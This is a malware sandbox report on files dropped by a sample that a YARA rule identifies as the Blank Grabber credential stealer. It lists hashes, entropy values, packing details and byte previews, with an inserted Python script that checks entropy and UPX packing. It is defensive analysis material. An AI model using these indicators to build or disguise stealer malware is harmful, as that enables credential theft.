                                                                                                                                                                                                                                SHA-256:8DE4F013BFECB9431AABAA97BB084FB7DE127B365B9478D6F7610959BF0D2783
                                                                                                                                                                                                                                SHA-512:2163414BC01FC30D47D1DE763A8332AFE96EA7B296665B1A0840D5197B7E56F4963938E69DE35CD2BF89158E5E2240A1650D00D86634AC2A5E2AD825455A2D50
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):110984
                                                                                                                                                                                                                                Entropy (8bit):7.696752308710476
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:n9JWx0ZlZV1wIhkmsW3v5rqAyvHMiUqu6fLmqsWb0ESs1lqAkZKKfvPykX5DlhLH:DH19hdsWftxPq7TmPFTXZ/fydp0
                                                                                                                                                                                                                                MD5:0E72CD64DE3B2DCAF5E8C865210CF79B
                                                                                                                                                                                                                                SHA1:C74631D639E609A71A05BC00AE57C9DCCC2E388B
                                                                                                                                                                                                                                SHA-256:039BE3916BE3310D9967AEEDF24C354E881ECD4213A9E64871801A12FF606B26
                                                                                                                                                                                                                                SHA-512:DDCF6E785F2067A04D6F3B5991EDFF54C4E7B48B9A8F186DD68EA0DF261E70846CD0E96DFE07357A6005E9819FE760E8BDB4143798E58FCABCD5F298A2564467
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PK........8..X.\..............stub-o.pyc..........8f.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):271628
                                                                                                                                                                                                                                Entropy (8bit):7.9960131360560105
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:6144:beJP6qQZDyuYii3eKNdmwB9eSCOK55UMxM9hQrF08rObP:2q9yoi3eKNdlP9Cr5PxIurw
                                                                                                                                                                                                                                MD5:A916B1FEE5C681D033175305BB399B74
                                                                                                                                                                                                                                SHA1:C3A17B54D5CDAF56536CEEBFD58701EE2C574E2F
                                                                                                                                                                                                                                SHA-256:067B93B38E89D000BFECC2612066F94434B3A850B0B9B22F4C0E9C62211B056E
                                                                                                                                                                                                                                SHA-512:4440F974011650E8DB814E269D7D02206D14BF66317A408A799564FBB83F3080AA7B43624EE3FAC0842AE72757209D9F21684CB94CAD5A021968CEFBD0B6B74B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:.@z......._pA...$h.H.....R..C)...i....38..Z~.4.w........|;.pq.....)O..G..)a...K......I8L.eN...LOY...p"m?.x.>....E.....&.I..N...p.+...1..r..C0d...... .rO.$...^......,...:..r..L..*.I...odWs.;$...c..b..........*O`..?<.3.#.O..v.OA....*.`..c...L......-...n....zB............)U...,y.......+.J]0..'..p...8AN$...1>'.....w.J...r..x'^..M....B.D./P.t.U.M.(.|........9d.....I.(."P....N"../.......%C...o..I.x....i..*...;(.E.._..7..Z.-..#.._BR~.]Bi.%...~r.5.....*.B3.(..0...@l$Vc...Eh:..i=?...w.*..oxlY.n..{..U.@pB..+ i.Jd.@L... .H.....>.1mx'^R'8.c...m....s.:...WaWT6\.....z.q........N....~H.3..o..O.*....\..T.<L.X..xy..i...;i..FH.._....u1....*.j.U.B.xP4.F..d.`.DUuA'.|:*#,...<.d+.]...R.X.E.h...d.!.A....e.^......#.h..<.F.Z._..6.....E.1..cg...<.......G1L. ...@}.@....."..G..X..U..k.(...=|5.W.^.....t....*x.n..g"y...b+.DW.\[..........X..X..Q..#.&G.x..T...>.F....../G...J...Z..#.x7.<s.x'L.t..........&...#j..2.,....!g.9.C.....x4........^.-...4!i..7..r.M..^...@..._..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1635096
                                                                                                                                                                                                                                Entropy (8bit):7.95287803315892
Encrypted:false
SSDEEP:49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
MD5:7F1B899D2015164AB951D04EBB91E9AC
SHA1:1223986C8A1CBB57EF1725175986E15018CC9EAB
SHA-256:41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
SHA-512:CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):29968
Entropy (8bit):7.677818197322094
Encrypted:false
SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:08B000C3D990BC018FCB91A1E175E06E
SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):228120
Entropy (8bit):7.928688904391487
Encrypted:false
SSDEEP:6144:Gmlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:l+t6Ce6XKtSHYomk2
MD5:264BE59FF04E5DCD1D020F16AAB3C8CB
SHA1:2D7E186C688B34FDB4C85A3FCE0BEFF39B15D50E
SHA-256:358B59DA9580E7102ADFC1BE9400ACEA18BC49474DB26F2F8BACB4B8839CE49D
SHA-512:9ABB96549724AFFB2E69E5CB2C834ECEA3F882F2F7392F2F8811B8B0DB57C5340AB21BE60F1798C7AB05F93692EB0AEAB077CAF7E9B7BB278AD374FF3C52D248
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1806616
Entropy (8bit):7.993924698335258
Encrypted:true
SSDEEP:49152:xm7u77uID/cZXnJ4Ph3tLm82R8PeDCemJ:Y7uJcZX6pumfJ
MD5:FB8BEDF8440EB432C9F3587B8114ABC0
SHA1:136BB4DD38A7F6CB3E2613910607131C97674F7C
SHA-256:CB627A3C89DE8E114C95BDA70E9E75C73310EB8AF6CF3A937B1E3678C8F525B6
SHA-512:B632235D5F60370EFA23F8C50170A8AC569BA3705EC3D515EFCAD14009E0641649AB0F2139F06868024D929DEFFFFFEFB352BD2516E8CD084E11557B31E95A63
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ._.A...A...A.......A.......A.......A.......A.......A...9e..A...9...A...A...@......cA.......A.......A.......A..Rich.A..........PE..d...cK.f.........." ...&..........P..ak...P..................................Pl...........`.........................................H.k.d....yk......pk......._.TI...........Ll. ...........................0mk.(...pmk.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........pk.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):630736
Entropy (8bit):6.409476333013752
Encrypted:false
SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:9C223575AE5B9544BC3D69AC6364F75E
SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:ASCII text
Category:dropped
Size (bytes):456
Entropy (8bit):4.447296373872587
Encrypted:false
SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:4531984CAD7DACF24C086830068C4ABE
SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:true
Yara Hits:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI43482\rarreg.key, Author: Joe Security
Reputation:unknown
Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):26392
Entropy (8bit):7.4349429154342905
Encrypted:false
SSDEEP:768:GW9SNyB153wXwCp5DlIjQGO/5YiSyv38aAMxkE7:4a3aDlIjQGOx7Sy/8Yxn
MD5:08B4CAEACCB6F6D27250E6A268C723BE
SHA1:575C11F72C8D0A025C307CB12EFA5CB06705561D
SHA-256:BD853435608486555091146AB34B71A9247F4AAA9F7ECFBC3B728A3E3EFDE436
SHA-512:9B525395DEC028EF3286C75B88F768E5D40195D4D5ADAB0775C64B623345D81DA1566596CC61A460681BC0ADBA9727AFC96C98AD2E54FF371919F3DB6D369B0C
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d....K.f.........." ...&.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):660248
Entropy (8bit):7.993344862024604
Encrypted:true
SSDEEP:12288:QTdlyELYyNiFVhF+v4GTHxoyMnYllAuz1eRDRA8z7B/oe7zMdxsp2gB:QTdlyK5oFVDQ4GGYsaejd1/oeTp2gB
MD5:482B3F8ADF64F96AD4C81AE3E7C0FB35
SHA1:91891D0EABB33211970608F07850720BD8C44734
SHA-256:1FBDB4020352E18748434EF6F86B7346F48D6FB9A72C853BE7B05E0E53EBBB03
SHA-512:5DE56E00AB6F48FFC836471421D4E360D913A78EE8E071896A2CD951FF20F7A4123ABD98ADF003CE166DCC82AAD248EBF8B63E55E14ECEEC8AA9A030067C0D1D
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d....K.f.........." ...&.....0...........................................................`..............................................#......................h......................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1016584
                                                                                                                                                                                                                                Entropy (8bit):6.669319438805479
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                                                                                                MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                                                                                                SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                                                                                                SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                                                                                                SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DE5A.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):302360
                                                                                                                                                                                                                                Entropy (8bit):7.986911403608574
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:CI6xDUAPCa+tr3XyOu6sNq64AnCK+V3evv7J7usiUZonaJnZ54QZ:CDLB+tryJ6sI647m7Fu4oM4QZ
                                                                                                                                                                                                                                MD5:27B3AF74DDAF9BCA239BF2503BF7E45B
                                                                                                                                                                                                                                SHA1:80A09257F9A4212E2765D492366ED1E60D409E04
                                                                                                                                                                                                                                SHA-256:584C2ECEA23DFC72AB793B3FD1059B3EA6FDF885291A3C7A166157CF0E6491C4
                                                                                                                                                                                                                                SHA-512:329C3A9159EA2FDCE5E7A28070BCF9D6D67ECA0B27C4564E5250E7A407C8B551B68A034BFDE9D8D688FA5A1AE6E29E132497B3A630796A97B464762CA0D81BB7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d....K.f.........." ...&.`.......0.......@................................................`.............................................X....................@.........................................................@...........................................UPX0.....0..............................UPX1.....`...@...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
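The three dropped PE32+ DLLs above show the two indicators an analyst reproduces first when triaging a drop listing: the 8-bit entropy (7.99 with "Encrypted:true" for the two UPX0/UPX1 images, 6.67 for the unpacked one with .text/.rdata/.data sections) and the packer markers visible in the Preview bytes (the UPX0/UPX1 section names and the "4.02..UPX!" header). The script below is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own logic: it recomputes Shannon entropy over a byte buffer, walks the PE headers to read the section names, and flags UPX. The 7.99 threshold, all function names and the constructed PE skeleton used as input are assumptions for illustration.

```python
import math
import struct
from collections import Counter

# Hypothetical threshold for an "encrypted" verdict, chosen for illustration;
# it is not the threshold the sandbox uses.
ENCRYPTED_THRESHOLD = 7.99


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer,
    8.0 when all 256 byte values occur equally often."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list:
    """Section names from the PE section table, or [] if data is not a PE.
    Walks MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table
    (40-byte entries whose first 8 bytes hold the NUL-padded name)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    coff = e_lfanew + 4
    if len(data) < coff + 20:
        return []
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _machine, nsec, _ts, _sym, _nsym, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    table = coff + 20 + opt_size
    names = []
    for i in range(nsec):
        raw = data[table + i * 40: table + i * 40 + 8]
        if len(raw) < 8:
            break
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def is_upx_packed(data: bytes, names: list) -> bool:
    """UPX leaves its section names (UPX0/UPX1) and a 'UPX!' magic in the
    header region, both of which show up in the report's Preview field."""
    return any(n.startswith("UPX") for n in names) or b"UPX!" in data[:4096]


def triage(data: bytes, threshold: float = ENCRYPTED_THRESHOLD) -> dict:
    """Recompute the per-file indicators for one buffer."""
    ent = shannon_entropy(data)
    names = pe_section_names(data)
    return {
        "entropy": round(ent, 6),
        "encrypted": ent >= threshold,
        "sections": names,
        "upx": is_upx_packed(data, names),
    }


def build_minimal_pe(section_names, payload: bytes = b"") -> bytes:
    """Constructed fixture: a minimal, non-runnable PE32+ skeleton with the
    given section names, used only so the parser can be exercised offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> offset 0x40
    opt = bytearray(240)                                # PE32+ optional header size
    struct.pack_into("<H", opt, 0, 0x20B)               # PE32+ magic
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, len(opt), 0x2022)
    table = b"".join(name.encode().ljust(8, b"\0") + bytes(32) for name in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table + payload


def demo() -> dict:
    """Two constructed samples: a UPX-style image with a high-entropy body,
    and an unpacked image with a low-entropy body."""
    high = bytes(range(256)) * 4096                      # uniform bytes, ~8.0 bits/byte
    low = b"\x00" * 16384                                # constant bytes, 0.0 bits/byte
    packed = build_minimal_pe(["UPX0", "UPX1", ".rsrc"], b"4.02\0UPX!" + high)
    plain = build_minimal_pe([".text", ".rdata", ".data", ".pdata", ".rsrc", ".reloc"], low)
    return {"packed": triage(packed), "plain": triage(plain)}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Run it against a real dropped file by replacing the constructed buffers with `open(path, "rb").read()`. High entropy on its own only says the body is compressed or encrypted; the section names and the "UPX!" magic are what distinguish a stock UPX layer (which `upx -d` removes) from custom encryption.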
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
